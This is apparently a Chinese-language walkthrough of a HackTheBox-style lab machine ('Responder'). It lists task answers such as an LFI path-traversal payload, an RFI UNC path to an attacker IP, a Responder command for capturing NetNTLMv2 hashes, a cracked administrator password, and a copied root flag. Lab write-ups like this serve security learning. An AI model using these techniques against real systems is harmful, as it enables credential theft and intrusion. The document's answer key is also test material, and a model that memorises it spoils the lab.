TASK 1
When visiting the web service using the IP address, what is the domain that we are being redirected to?
unika.htb
我们直接输入IP发现重定向到了unika.htb但是这个域名没有办法解析到对应的 IP 地址,所以我们需要通过修改hosts文件来确定 IP 地址
修改hosts文件
可以正常访问了
TASK 2
Which scripting language is being used on the server to generate webpages?
php
TASK 3
What is the name of the URL parameter which is used to load different language versions of the webpage?
page
TASK 4
Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
../../../../../../../../windows/system32/drivers/etc/hosts
TASK 5
Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
//10.10.14.6/somefile
TASK 6
What does NTLM stand for?
New Technology LAN Manager
TASK 7
Which flag do we use in the Responder utility to specify the network interface?
-I
TASK 8
There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.
john the ripper
TASK 9
What is the password for the administrator user?
badminton
responder -I tun0
john可能会报这个错误
参考下面文章
解决john不能开多个进程的问题_weixin_30760895的博客-CSDN博客
TASK 10
We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
5985
SUBMIT FLAG
Submit root flag
用evil-winrm连接(gem install evil-winrm下载)
也不知道是哪里的问题
只搜到了一个帖子
evil-winrm: Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initial
只能抄答案了 ea81b7afddd03efaa0945333ed147fac